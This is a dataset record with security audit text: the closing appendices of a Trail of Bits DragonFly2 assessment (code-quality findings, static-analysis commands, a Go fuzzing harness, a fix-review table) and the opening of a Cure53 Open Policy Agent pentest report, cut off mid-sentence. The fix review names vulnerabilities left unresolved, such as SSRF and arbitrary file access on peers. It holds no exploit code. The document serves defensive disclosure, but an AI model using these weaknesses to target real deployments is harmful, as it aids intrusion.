Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , \"127.0.0.1\" , \n DefaultObjectStorageStartPort), \n } \n Figure C.6.1: an example use of fmt.Sprintf method to concatenate host and port \n ( Dragonfly2/client/config/dfstore.go#44\u201348 ) \n 7. An unchecked type assertion is used in multiple places. For example, in the \n ClientDaemon.Serve method, the type assertion may panic if the cfg variable \n does not represent a valid config.DaemonOption structure. Either use checked \n assertions instead, or make sure that unchecked type assertions never fail. \n daemonConfig := cfg.(*config.DaemonOption) \n Trail of Bits 62 DragonFly2 Security Assessment \n P U B L I C \n Figure C.7.1: An example of unchecked type assertion \n ( Dragonfly2/client/daemon/daemon.go#776 ) \n return rawPeer.(*Peer), loaded \n Figure C.7.2: Another example of unchecked type assertion \n ( Dragonfly2/scheduler/resource/host.go#362 ) \n 8. Code copied from other repositories or from Go standard packages are not up \n to date. For example, the ParseRange function seem s to miss the \ufb01x for Range \n headers with double negative sign (see issue #40940 ). Update the copy-pasted code \n and design a process to keep the code in sync with the upstream. \n // copy from go/1.15.2 net/http/fs.go ParseRange \n func ParseRange(s string , size int64 ) ([]Range, error ) { \n Figure C.8.1: An example non-updated method \n ( Dragonfly2/pkg/net/http/range.go#63\u201364 ) \n 9. Hard-coded strings are used instead of constants. For example, in a few places \n the bytes= string is used, but in other places, the http.RangePrefix constant is \n used. We recommend de\ufb01ning and using constants whenever possible. \n urlMeta.Range = strings.TrimLeft(r, http.RangePrefix) \n Figure C.9.1: An example use of a constant \n ( Dragonfly2/scheduler/job/job.go#175 ) \n rg = strings.TrimLeft(r, \"bytes=\" ) \n Figure C.9.2: An example use of hard-coded string literal \n ( Dragonfly2/client/dfget/dfget.go#226 ) \n 10. Incorrect comment in scheduler/evaluator code. In the code shown in \ufb01gure \n C.10.1, the highlighted comment says that the output ranges from 0 to unlimited. \n However, the output actually ranges only from 0 to 1. \n // calculateParentHostUploadSuccessScore 0.0~unlimited larger and better. \n func calculateParentHostUploadSuccessScore(peer *resource.Peer) float64 { \n uploadCount := peer.Host.UploadCount.Load() \n uploadFailedCount := peer.Host.UploadFailedCount.Load() \n if uploadCount < uploadFailedCount { \n return minScore \n } \n // Host has not been scheduled, then it is scheduled first. \n Trail of Bits 63 DragonFly2 Security Assessment \n P U B L I C \n if uploadCount == 0 && uploadFailedCount == 0 { \n return maxScore \n } \n return float64 (uploadCount-uploadFailedCount) / float64 (uploadCount) \n } \n Figure C.10.1: Function with incorrect comment \n ( Dragonfly2/scheduler/scheduling/evaluator/evaluator_base.go#109-123 ) \n 11. Repeated code. In client/daemon/peer/peertask_bitmap.go , the NewBitmap \n and NewBitmapWithCap functions are nearly identical. The implementation of \n NewBitmap could be replaced with a call to NewBitmapWithCap(8) . \n 12. Incorrect comment in proxy code. In the following code snippet, the if statement \n checks only whether resp.ContentLength is -1 , but the comment implies that a 0 \n check should be done as well: \n // when resp.ContentLength == -1 or 0, byte count can not be updated by transport \n if resp.ContentLength == - 1 { \n metrics.ProxyRequestBytesCount.WithLabelValues(req.Method).Add( float64 (n)) \n } \n Figure C.12.1: Code with incorrect comment \n ( Dragonfly2/client/daemon/proxy/proxy.go#409-412 ) \n 13. Bitmap functions are easy to misuse. Functions on the bitmap data structure \n de\ufb01ned in Dragonfly2/client/daemon/peer/peertask_bitmap.go are easy to \n misuse in a way that can cause security vulnerabilities. The following usage \n instructions should be documented in comments: \n \u25cb Call Set or Sets only when the current value(s) are false to avoid \n invalidating the settled value. \n \u25cb Do not call Sets with duplicate entries to avoid invalidating the settled \n value. \n \u25cb Call Clean only when the current value is true to avoid invalidating the \n settled value, accidentally setting the value to true , or causing an \n out-of-bounds access panic. \n \u25cb Use a mutex to protect calls to Set , Clean , Sets , and IsSet . A mutex is not \n needed when calling Settled . \n \u25cb Do not call any function with negative index arguments. \n Trail of Bits 64 DragonFly2 Security Assessment \n P U B L I C \n \u25cb Do not call NewBitmapWithCap(0) , since calling Set on the resulting bitmap \n will cause an in\ufb01nite loop. \n We did not notice any incorrect usage of the bitmap functions in the current \n Dragon\ufb02y codebase. \n Trail of Bits 65 DragonFly2 Security Assessment \n P U B L I C \n D. Automated Static Analysis \n This appendix describes the setup of the automated analysis tools used during this audit. \n Though static analysis tools frequently report false positives, they detect certain categories \n of issues, such as memory leaks, misspeci\ufb01ed format strings, and the use of unsafe APIs, \n with essentially perfect precision. We recommend periodically running these static analysis \n tools and reviewing their \ufb01ndings. \n Semgrep \n To install Semgrep, we used pip by running python3 -m pip install semgrep . We used \n version 1.32.0 of the Semgrep. To run Semgrep on the codebase, we ran the following in \n the root directory of the project: \n semgrep --config \"p/trailofbits\" --sarif --metrics=off --output \n semgrep.sarif \n We also ran the tool with the following rules (con\ufb01gs): \n \u25cf p/golang \n \u25cf p/semgrep-go-correctness \n \u25cf p/r2c-security-audit \n \u25cf https://semgrep.dev/p/gosec \n We recommend integrating Semgrep into the project's CI/CD pipeline. Integrate at least the \n rules with HIGH con\ufb01dence and the rules with MEDIUM con\ufb01dence and HIGH impact. \n In addition to the three con\ufb01gurations listed above, we recommend using Trail of Bits\u2019 set \n of Semgrep rules (from the repository, or less preferably, from the registry ) and dgryski \n rules . \n CodeQL \n We installed CodeQL by following CodeQL's installation guide . We used CodeQL version \n 2.13.3, with Go version 1.20.6. \n After installing CodeQL, we ran the following command to create the project database for \n the DragonFly2 repository: \n codeql database create codeql.db -l go \n We then ran the following command to query the database: \n codeql database analyze ./codeql.db --format=sarif-latest -o \n codeql.sarif -- go-security-and-quality.qls \n Trail of Bits 66 DragonFly2 Security Assessment \n P U B L I C \n We used the go-security-and-quality , go-security-experimental , and custom \n Trail of Bits query packs. \n Although the CodeQL tool is used in DragonFly2\u2019s CI pipeline, the tool found dozens of \n issues. This may be due to usage of experimental and custom rules, because of weak \n con\ufb01guration of the tool in the pipeline, or because \ufb01ndings reported in the pipeline were \n not \ufb01xed. \n Other static analysis tools \n Although the only SAST tools used during the audit were Semgrep and CodeQL, we \n recommend using the following tools, either in an ad-hoc manner or by integrating them \n into the CI/CD pipeline: \n \u25cf golangci-lint : This tool is a wrapper around various other tools (some but not all \n of which are listed below). \n \u25cf Go-sec is a static analysis utility that looks for a variety of problems in Go \n codebases. Notably, go-sec will identify potential stored credentials, unhandled \n errors, cryptographically troubling packages, and similar problems. \n \u25cf Go-vet is a very popular static analysis utility that searches for more go -speci\ufb01c \n problems within a codebase, such as mistakes pertaining to closures, marshaling, \n and unsafe pointers. Go-vet is integrated within the go command itself, with \n support for other tools through the vettool command line \ufb02ag. \n \u25cf Staticcheck is a static analysis utility that identi\ufb01es both stylistic problems and \n implementation problems within a Go codebase. Note that many of the stylistic \n problems that staticcheck identi\ufb01es are also indicative of potential \u201cproblem \n areas\u201d in a project. \n \u25cf Ineffassign is a static analysis utility that identi\ufb01es ine\ufb00ectual assignments. These \n ine\ufb00ectual assignments often identify situations in which errors go unchecked, \n which could lead to unde\ufb01ned behavior of the program due to execution in an \n invalid program state. \n \u25cf Errcheck is a static analysis utility that identi\ufb01es situations in which errors are not \n handled appropriately. \n \u25cf GCatch contains a suite of static detectors aiming to identify concurrency bugs in \n large, real Go software systems. \n Please also see our blog post on Go security assessment techniques for further discussion \n of the Go-related analysis tools. \n Trail of Bits 67 DragonFly2 Security Assessment \n P U B L I C \n E. Automated Dynamic Analysis \n This appendix describes the setup of the automated dynamic analysis tools and test \n harnesses used during this audit. \n The purpose of automated dynamic analysis \n In most software, unit and integration tests are typically the extent to which testing is \n performed. This type of testing detects the presence of functionality, allowing developers \n to ensure that the given system adheres to the expected speci\ufb01cation. However, these \n methods of testing do not account for other potential behaviors that an implementation \n may exhibit. \n Fuzzing and property-based testing complement both unit and integration testing by \n identifying deviations in the expected behavior of a component of a system. These types of \n tests generate test cases and provide them to the given component as input. The tests then \n run the components and observe their execution for deviations from expected behaviors. \n The primary di\ufb00erence between fuzzing and property testing is the method of generating \n inputs and observing behavior. Fuzzing typically attempts to provide random or randomly \n mutated inputs in an attempt to identify edge cases in entire components. Property testing \n typically provides inputs sequentially or randomly within a given format, checking to ensure \n a speci\ufb01c property of the system holds upon each execution. \n By developing fuzzing and property-based testing alongside the traditional set of unit and \n integration tests, edge cases and unintended behaviors can be pruned during the \n development process, which will likely improve the overall security posture and stability of \n a system. \n Tooling \n Go supports fuzzing in its standard toolchain beginning in Go 1.18. However, we \n recommend considering the Trail of Bits fork of go-fuzz that \ufb01xes type alias issues, adds \n dictionary support, and provides new mutation strategies. Moreover, we recommend using \n our helper tools for e\ufb03ciency and better experience: \n \u25cf Go-fuzz-prepare : a utility for automatic generation of go-fuzz fuzzing harnesses for \n various functions \n \u25cf go-fuzz-utils : a helper package that provides a simple interface to produce random \n values for various data types and can recursively populate complex structures from \n raw fuzz data \n Trail of Bits 68 DragonFly2 Security Assessment \n P U B L I C \n Setup and execution \n First, copy the harness to the client/daemon/rpcserver/rpcserver_test.go \ufb01le. \n Then, inside directory with the \ufb01le, run the following command: \n go test -fuzz ^\\QFuzzTestGrpcToB\\E$ -run ^$ \n where FuzzTestGrpcToB is the name of a function that receives as argument pointer to \n testing.F . This command will start a fuzzer that will run until a \ufb01rst error is detected. \n To debug a single input created by the fuzzer, run: \n go test -run=FuzzTestGrpcToB/<filename> \n where <filename> is the name of a \ufb01le that can be found in the seeds directory\u2014that is, \n inside the ./client/daemon/rpcserver/testdata/fuzz/FuzzTestGrpcToB . \n To get coverage of the fuzzing test, back up seeds, and replace them with the internal \n fuzzer\u2019s inputs: \n cp -rf <seeds directory> ./seeds_backup \n ln -s \"$(go env \n GOCACHE)/fuzz/d7y.io/dragonfly/v2/client/daemon/rpcserver/FuzzTes \n tGrpcToB\" <seeds directory> \n The internal fuzzer\u2019s data is simply a set of \u201cinteresting\u201d \ufb01les: \ufb01les that, when provided to \n the fuzzing harness as an input, generate new coverage that was not generated by other \n inputs. \n Now run the FuzzTestGrpcToB as a normal test with coverage gathering options (e.g., \n golang\u2019s -cover \ufb02ag). \n Sample harnesses \n Below we provide a draft of the fuzzing harness created during the audit. The code in \ufb01gure \n E.1 implements a fuzz test for the Download method of the dfget daemon gRPC service. It \n sets up a local gRPC server (using the same code as the TestServer_ServeDownload \n test), then creates a gRPC client and uses it to call the server with random data. If the \n server panics, then the client receives an error with codes.Internal code (because there \n is a recovery handler used in the gRPC server). \n Please note that the harness is a very simple one, and not very e\ufb00ective. It is slow (about \n 3,000 executions per second) because of communication over the Unix socket. It is only a \n demonstration of how a fuzzing harness can be constructed and used. \n Trail of Bits 69 DragonFly2 Security Assessment \n P U B L I C \n func FuzzTestGrpcToB(f *testing.F) { \n assert := testifyassert.New(f) \n ctrl := gomock.NewController(f) \n defer ctrl.Finish() \n mockPeerTaskManager := peer.NewMockTaskManager(ctrl) \n srv := &server{ \n KeepAlive: util.NewKeepAlive( \"test\" ), \n peerHost: &schedulerv1.PeerHost{}, \n peerTaskManager: mockPeerTaskManager, \n } \n socketDir, err := ioutil.TempDir(os.TempDir(), \"d7y-test-***\" ) \n assert.Nil(err, \"make temp dir should be ok\" ) \n socket := path.Join(socketDir, \"rpc.sock\" ) \n defer os.RemoveAll(socketDir) \n if srv.healthServer == nil { \n srv.healthServer = health.NewServer() \n } \n srv.downloadServer = dfdaemonserver.New(srv, srv.healthServer) \n srv.peerServer = dfdaemonserver.New(srv, srv.healthServer) \n ln, err := net.Listen( \"unix\" , socket) \n assert.Nil(err, \"listen unix socket should be ok\" ) \n go func () { \n if err := srv.ServeDownload(ln); err != nil { \n f.Error(err) \n } \n }() \n netAddr := &dfnet.NetAddr{ \n Type: dfnet.UNIX, \n Addr: socket, \n } \n client, err := dfdaemonclient.GetInsecureV1(context.Background(), \n netAddr.String()) \n assert.Nil(err, \"grpc dial should be ok\" ) \n f.Fuzz( func (t *testing.T, uu, url, output, tag, filter, rang, digest string , \n bs, koo, rec bool , uid, gid int64 ) { \n request := &dfdaemonv1.DownRequest{ \n Uuid: uu, \n Url: url, \n Output: output, \n DisableBackSource: bs, \n UrlMeta: &commonv1.UrlMeta{ \n Tag: tag, \n Filter: filter, \n Range: rang, \n Digest: digest, \n }, \n Uid: uid, \n Trail of Bits 70 DragonFly2 Security Assessment \n P U B L I C \n Gid: gid, \n KeepOriginalOffset: koo, \n Recursive: rec, \n } \n stream, err := client.Download(context.TODO(), request) \n if err != nil { \n // client-side error, skip \n return \n } \n _, err = stream.Recv() \n if err != nil && status.Code(err) == codes.Internal { \n t.Error(err) \n } \n }) \n } \n Figure E.1: An example fuzzing harness \n Trail of Bits 71 DragonFly2 Security Assessment \n P U B L I C \n F. Fix Review Results \n When undertaking a \ufb01x review, Trail of Bits reviews the \ufb01xes implemented for issues \n identi\ufb01ed in the original report. This work involves a review of speci\ufb01c areas of the source \n code and system con\ufb01guration, not comprehensive analysis of the system. \n On August 18, 2023, Trail of Bits reviewed the \ufb01xes and mitigations implemented by the \n DragonFly2 team for the issues identi\ufb01ed in this report. We reviewed each \ufb01x to determine \n its e\ufb00ectiveness in resolving the associated issue. \n In summary, of the 19 issues described in this report, DragonFly2 has resolved 11 issues, \n has partially resolved \ufb01ve issues, and has not resolved the remaining three issues. For \n additional information, please see the Detailed Fix Review Results below. \n ID Title Status \n 1 Authentication is not enabled for some Manager\u2019s endpoints Partially \n Resolved \n 2 Server-Side Request Forgery vulnerabilities Partially \n Resolved \n 3 Manager makes requests to external endpoints with disabled TLS \n authentication Resolved \n 4 Incorrect handling of a task structure\u2019s usedTra\ufb03c \ufb01eld Resolved \n 5 Directories created via os.MkdirAll are not checked for permissions Partially \n Resolved \n 6 Slicing operations with hard-coded indexes and without explicit length \n validation Resolved \n 7 Files are closed without error check Resolved \n 8 Timing attacks against Proxy\u2019s basic authentication are possible Resolved \n Trail of Bits 72 DragonFly2 Security Assessment \n P U B L I C \n 9 Possible panics due to nil pointer dereference, when using variables \n created alongside an error Resolved \n 10 TrimLeft is used instead of TrimPre\ufb01x Resolved \n 11 Vertex.DeleteInEdges and Vertex.DeleteOu tEdges functions are not \n thread safe Unresolved \n 12 Arbitrary \ufb01le read and write on a peer machine Partially \n Resolved \n 13 Manager generates mTLS certi\ufb01cates for arbitrary IP addresses Unresolved \n 14 gRPC requests are weakly validated Partially \n Resolved \n 15 Weak integrity checks for downloaded \ufb01les Unresolved \n 16 Invalid error handling, missing return statement Resolved \n 17 Tiny \ufb01le download uses hard coded HTTP protocol Resolved \n 18 Incorrect log message Resolved \n 19 Usage of architecture-dependent int type Resolved \n Trail of Bits 73 DragonFly2 Security Assessment \n P U B L I C \n Detailed Fix Review Results \n TOB-DF2-1: Authentication is not enabled for some Manager\u2019s endpoints \n Partially resolved in PR 2583 and PR 2590 . New endpoints for creation and management of \n personal access tokens were created. The endpoints are protected with RBAC, as they were \n for other authenticated endpoints. Generated tokens are stored in the database. A new \n middleware was added that checks if a token provided with a request is in the database. \n There are new job endpoints that mimic the behavior of the old job endpoints but are \n protected with the new middleware. In other words, a new authentication mechanism was \n added to the system and it is used to protect newly created endpoints. \n However, the unauthenticated endpoints reported in the \ufb01nding are still accessible to \n users; these were neither removed nor protected with RBAC or the new middleware. \n Moreover, the newly implemented feature is vulnerable to timing attacks. Requests to the \n database for token retrieval are not constant time. We recommend to resolve this issue by \n either (in order of security of the recommendation): \n 1. Storing the personal access tokens protected with hash-based message \n authentication codes (HMACs). That is, instead of storing a raw token, store \n HMAC(key, token) . The key should be a constant server-side secret key. Then \n perform the lookup on the HMAC when a user supplies a token. \n 2. Pre\ufb01xing a token with a unique index and storing the index alongside the token in \n the database (preferably in a new column). Then, for every user\u2019s request, perform a \n database lookup to retrieve a token (this only compares the indexes), and then \n compare the retrieved token with the user-provided token using a constant-time \n comparison function. \n TOB-DF2-2: Server-side request forgery vulnerabilities \n Partially resolved in PR 2611 . Only one SSRF attack vector was mitigated. The previously \n vulnerable preheat endpoint handlers now use a secure version of the HTTP client that \n allows requests only to IP addresses that are of global unicast type and are not private. The \n vulnerable pieceManager.DownloadSource method was not \ufb01xed. The attack vector via \n HTTP redirects was not \ufb01xed. \n TOB-DF2-3: Manager makes requests to external endpoints with disabled TLS \n authentication \n Resolved in PR 2612 . Con\ufb01guration options were added to the preheat endpoints, \n enabling users to provide Certi\ufb01cate Authorities for TLS connections. \n TOB-DF2-4: Incorrect handling of a task structure\u2019s usedTra\ufb03c \ufb01eld \n Resolved in PR 2634 . The usedTraffic \ufb01eld is now correctly updated in the \n processPieceFromSource method. \n Trail of Bits 74 DragonFly2 Security Assessment \n P U B L I C \n TOB-DF2-5: Directories created via os.MkdirAll are not checked for permissions \n Partially resolved in PR 2613 . Files and directories permissions were made more restrictive. \n However, the main vulnerability reported\u2014lack of pre-existence or post-veri\ufb01cation checks \n for newly created \ufb01les and directories\u2014was not addressed. \n TOB-DF2-6: Slicing operations with hard-coded indexes and without explicit length \n validation \n Resolved in PR 2636 . Explicit length validations were added to the reported vulnerable \n methods. \n TOB-DF2-7: Files are closed without error check \n Resolved in PR 2599 . Deferred methods checking for errors on \ufb01les close were added. \n TOB-DF2-8: Timing attacks against Proxy\u2019s basic authentication are possible \n Resolved in PR 2601 . A constant-time comparison is now used to perform basic \n authentication in the Proxy. \n TOB-DF2-9: Possible panics due to nil pointer dereference when using variables \n created alongside an error \n Resolved in PR 2602 . Both instances of the vulnerability were \ufb01xed by replacing the \n potentially-nil variables with not-nil ones. Other instances of the vulnerability were either \n not found or not looked for. \n TOB-DF2-10: TrimLeft is used instead of TrimPre\ufb01x \n Resolved in PR 2603 . Calls to the TrimLeft method were replaced with calls to the \n TrimPrefix . \n TOB-DF2-11: Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not \n thread safe \n Unresolved in PR 2614 . A new per-vertex mutex is added. It is used to synchronize access \n to a single vertex in calls to the Vertex.DeleteInEdges and Vertex.DeleteOutEdges \n methods. However, the reported vulnerability regards a race condition that results in an \n invalid state between two (or more) vertices, not the invalid state of a single vertex. \n The original recommendation of using DAG\u2019s mutex (instead of a new, per-vertex mutex) \n still applies. \n TOB-DF2-12: Arbitrary \ufb01le read and write on a peer machine \n Partially resolved in PR 2637 . The implemented \ufb01x disallows users to override already \n existing \ufb01les using the ExportTask endpoint. This mitigates the impact of the vulnerability, \n making it harder for adversaries to gain remote code execution capabilities. However, the \n root of the vulnerability was not resolved. It is still possible to access, read, and write \n arbitrary \ufb01les on peers\u2019 machines. \n Trail of Bits 75 DragonFly2 Security Assessment \n P U B L I C \n The DragonFly2 team indicated that an allowlist for \ufb01les will be implemented in the future. \n TOB-DF2-13: Manager generates mTLS certi\ufb01cates for arbitrary IP addresses \n Unresolved in PR 2615 . The code that was marked with TODO comments was removed, \n instead of being \ufb01xed to resolve the vulnerability. The vulnerability still exists. \n TOB-DF2-14: gRPC requests are weakly validated \n Partially resolved in PRs 163 , 164 , 165 , 2616 . The url_meta \ufb01elds were marked as \n required. The digest \ufb01elds are now validated with a regex that checks hashes lengths. \n However, the regex has a typo bug that should be \ufb01xed. \n TOB-DF2-15: Weak integrity checks for downloaded \ufb01les \n Unresolved. The vulnerability was not resolved in any of the provided pull requests. \n TOB-DF2-16: Invalid error handling, missing return statement \n Resolved in PR 2610 . Missing return statements were added. \n TOB-DF2-17: Tiny \ufb01le download uses hard coded HTTP protocol \n Resolved in PR 2617 . The protocol and TLS con\ufb01guration used for tiny \ufb01le downloads were \n made con\ufb01gurable. \n TOB-DF2-18: Incorrect log message \n Resolved in PR 2618 . The incorrect error messages were changed so that they provide \n unambiguous information to users. \n TOB-DF2-19: Usage of architecture-dependent int type \n Resolved in PR 2619 . The example instance of the issue was \ufb01xed by replacing int type \n with int64 . Other instances of the vulnerability were either not present or not looked for. \n Trail of Bits 76 DragonFly2 Security Assessment \n P U B L I C \n G. Fix Review Status Categories \n The following table describes the statuses used to indicate whether an issue has been \n su\ufb03ciently addressed. \n Fix Status \n Status Description \n Undetermined The status of the issue was not determined during this engagement. \n Unresolved The issue persists and has not been resolved. \n Partially Resolved The issue persists but has been partially resolved. \n Resolved The issue has been su\ufb03ciently resolved. \n Trail of Bits 77 DragonFly2 Security Assessment \n P U B L I C \n" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Open Policy Agent (OPA)", - "file_name": "SECURITY_AUDIT.pdf" - }, - "content": [ - { - "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nPentest-Report Open Policy Agent 08.2018\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, BSc. J. Hector, Dipl.-Ing. A. Aranguren,\nDipl.-Ing. A. Inf\u00fchr\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual Code Auditing and Documentation Review\nPart 2 (Code-Assisted Penetration Testing)\nIdentified Vulnerabilities\nOPA-01-001 Server: Insecure Default Config allows to bypass Policies (Medium)\nOPA-01-005 Server: OPA Query Interface is vulnerable to XSS (High)\nMiscellaneous Issues\nOPA-01-002 Server: Query Interface can be abused for SSRF (Medium)\nOPA-01-003 Server: Unintended Behavior due to unclear Documentation (Medium)\nOPA-01-004 Server: Denial of Service via GZip Bomb in Bundle (Info)\nOPA-01-006 Server: Path Mismatching via HTTP Redirects (Info)\nConclusions\nIntroduction\n\u201cThe Open Policy Agent (OPA) is an open source, general-purpose policy engine that\nenables unified, context-aware policy enforcement across the entire stack. OPA is\nhosted by the Cloud Native Computing Foundation (CNCF) as a sandbox level project.\u201d\nFrom https://github.com/open-policy-agent/opa\nThis report documents the results of a security assessment against the Open Policy\nAgent (OPA) framework. The project, which entailed both a penetration test and a\nsource code audit of the OPA compound, was carried out by Cure53 in August 2018 and\nyielded six security-relevant discoveries. It is crucial to underscore that the assessment\nwas sponsored by The Linux Foundation / CNCF and constitutes one of a growing\nnumber of security-centric projects targeting the CNCF-related software and\ncommissioned by the funders to the Cure53 team.\nCure53, Berlin \u00b7 08/30/18 1/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nIt needs to be noted that the OPA framework is almost entirely written in Go and this had\na bearing on the employed approaches and personnel resources. From the Cure53\nteam, six testers were tasked with the completion of the project. In terms of time, a total\nof eighteen days were invested into the assessment and allocated primarily to testing\nand auditing, as well as to reporting and documentation.\nThe Cure53 team investigated the OPA framework through a range of methods,\nreviewing the scoped source code and pentesting a reference implementation made\navailable by the software maintainers. Notably, OPA can be deployed and used in two\ndifferent ways, either as daemon or as a library. With this knowledge, Cure53 honed in\non examining both deployment routes after receiving all necessary information from the\nmaintainers\u2019 side. The white-box approach of this test relates to the fact that all relevant\nOPA sources are available on GitHub so everything of note could be used for testing\nand added to the scope. Nevertheless, one item - the control panel - was excluded from\nthe list of test-targets. While this item was not investigated, it was utilized for testing.\nThe tests generally proceeded on schedule and the Cure53 team strongly believes that\na good coverage has been reached on the scope. Throughout the assessment, the\ncommunications were done on Slack and the OPA maintainers invited Cure53 into a\ndedicated private channel. All emerging questions posed by the testers were answered\nby the OPA team in a prompt, precise and comprehensive manner. Significantly, no live-\nreporting was requested by the OPA maintainers, meaning that Cure53 only reported the\nheadlines of the findings during the test.\nAs far as the array of six findings is concerned, two problems were categorized as\nsecurity vulnerabilities and four as general weaknesses. On the one hand, one finding\nwas given a rather concerning \u201c High\u201d-severity ranking. On the other hand, most of the\nspotted issues had lesser implications. Furthermore, not a single flaw has been recorded\nas \u201cCritical\u201d in terms of impact and the overall number of findings should be seen as\nacceptable.\nIn the following sections, the report will first elaborate on the scope and then offers a\ndedicated, highly detailed section on the Test Methodology in order to enable tracking of\nprogress and coverage to the funders and maintainers alike. Next, each finding is\nseparately discussed together with its technical background and mitigation options.\nLastly, Cure53 delivers some broader conclusion notes in the closing section. In light of\nthe findings, the testing team comments on the security posture of the tested OPA\nframework manifested during this assignment.\nCure53, Berlin \u00b7 08/30/18 2/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nScope\n\u2022Open Policy Agent\n\u25e6https://github.com/open-policy-agent/opa \n\u2022Reference setup from OPA\n\u25e6A setup with three hosts, reflecting a common deployment scenario and provided by \nthe OPA maintainers.\n\u25e6Cure53 was given access to both possible ways of implementing OPA, full SSH \naccess was granted to allow better insights and efficient debugging.\nTest Methodology\nPart 1. Manual Code Auditing and Documentation Review\nThis section provides information about the process followed during the first part of the\ntest, highlighting some of the actions taken during the manual code audit against the\nsources of the Open Policy Agent system. Below one can find a list which reflects the\nsignificant efforts made during the assessment. This demonstrates that, despite the\nrelative low number of findings stemming from this test, various strategies and\napproaches were systematically and creatively deployed against the items in the OPA\nscope. Once again, it needs to be reiterated that a good level of coverage was achieved\nby the Cure53 team during this project.\n\u2022The available documentation and deployment instructions were thoroughly\nreviewed for possible weaknesses, any potential for misinterpretation, as well as\nvulnerable examples. For instance, the provided sample apps/APIs were\nchecked to see whether there any common errors could might confuse OPA\nwhen the app extracts request headers and forwards them. The solution\nappeared robust enough and potential issues were discussed as highly\ndependent on the configuration and deployment of the frontend.\n\u2022The OPA source code was reviewed to determine if URL path traversals could\nlead to policy bypasses. This was checked on both the Go and Python examples\nprovided, although they were not exactly in scope. Still, these could demonstrate\nerrors that are typically made during writing of the frontend code.\n\u2022The application source code of OPA was reviewed for common data parsing\nflaws, however the application uses JSON instead of XML, hence reducing the\nattack surface substantially. An XSS issue inside the HTML template for the\nindex route via JSON parsing errors was eventually identified and documented\nunder OPA-01-005.\n\u2022The PAM setup was analyzed for MitM (Man-in-the-Middle) potential via\nenvironment variables. It was found that PAM prevents that unless specifically\nCure53, Berlin \u00b7 08/30/18 3/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \ntold to use ~/.pam_environment. Similarly, as OPA allows to communicate with\nthe control panel via HTTPs, the code was checked for the presence of\nInsecureSkipVerify, as this would indicate that a setting weakening the SSL\ncertificate parsing exists on the scope.\n\u2022The supplied codebase was also assessed for possible command execution,\nevaluation of code, file handling and other similar pitfalls (i.e. via calls to os.*,\nioutils.*, etc.).\n\u2022The code related to authorization and authentication was reviewed for particular,\nusual flaws in this application areas, resulting in OPA-01-003\n\u2022The available routes were audited to identify weaknesses in the provided built-in\nfunctions of rego. For example, it was attempted to identify endpoints that might\nbe abusable via SSRF or when OPA is directly reachable or not bound to\nlocalhost. This resulted in the SSRF issue described in OPA-01-002. Additionally,\nas OPA permits the use of http.send in the rego language, the source code was\nreviewed for the presence of RegisterProtocol. Having this protocol in place\nwould have allowed adding extra protocols to the HTTP library. However, it was\nconcluded that OPA only supports the default protocols handler.\n\u2022The storage implementation was reviewed for possible security flaws. As OPA\ndoes not use any kind of file storage, it is not possible for an attacker to drop files\nby abusing APIs. In essence, all key actions are done in memory and not the file\nsystem.\n\u2022The source code was additionally reviewed for security issues, focusing on\ncommon sinks, logic flaws and potential to bypass OPA policies.\nPart 2 (Code-Assisted Penetration Testing)\nThe following list notes some of the noteworthy steps undertaken during the second part\nof the test. This component of the project entailed code-assisted penetration testing\nagainst the OPA solution in scope. An analysis at runtime was deemed as an\nappropriate approach to complement the source code audit, thus enabling confirmation\nor verification of the suspected issues. In addition, it made it possible for the testers to\nobserve the application dynamically, together with all its underlying packages and\nlibraries. Some of the specific steps performed during this phase can be consulted in the\nbullet-points list below.\n\u2022OPA offered Cure53 a test website ( cure53.styra.com) to manage the settings.\nAlthough the website itself was out of scope during this engagement, testers\nlogged-in, identified the available functionality and drafted possible attack vectors\nbased on the observed behaviors. This provided a good overview of how OPA is\nsupposed to be deployed in practice.\nCure53, Berlin \u00b7 08/30/18 4/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n\u2022OPA was configured and set up locally, following the publicly available\ninstructions1. Multiple attack vectors were then tried against the local setup. For\nexample, a general analysis of the overall PAM/OPA setup resulted in\nidentification of OPA-01-001. Similarly, the PAM module was reviewed for\nmemory corruption issues through a malicious server.\n\u2022The application and APIs were analyzed at runtime, attempting multiple ACL and\nlogic bypasses, as well as common web attack vectors (XSS, RCE, etc.).\nEventually this led to the XSS issue described under OPA-01-005.\n\u2022It was discovered that path parameters in OPA can contain \u201c..\u201d and that the OPA\nweb client supports redirects. However, abusing this design behavior was not\npossible during this assessment.\n\u2022Multiple tests were performed to determine possible weaknesses in\nundocumented functionality of the rego parser used by OPA.\n\u2022Efforts were also made into uncovering data leakage flaws, first by identifying\nareas possibly prone to such flaws and later by attempting to send various\ncrafted payloads to the corresponding functional areas.\n\u2022A number of tests were performed to verify if the defined policy rules could be\nbypassed. This focused on query information sent to the simple query API, which\nwas used by the example applications. Additionally, various tests were carried\nout to determine if path mismatches could be potentially exploited in certain\nscenarios. This also included a check to reach OPA endpoints which would leak\npolicy information whilst the API should not be reachable. The internally parsing\nof the received paths did not allow such behaviors.\n\u2022The Go HTTP server exclusively supports standard protocols, like HTTP/HTTPS,\nbased on common Go libraries. It generally offers very little opportunity for\npossible security issues. However, it was noted that gzip compression is\nsupported, which led to the DoS finding described under OPA-01-004.\n1 https://github.com/open-policy-agent/opa/blob/master/docs/devel/DEVELOPMENT.md\nCure53, Berlin \u00b7 08/30/18 5/14 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in a chronological order rather than by\ntheir degree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each 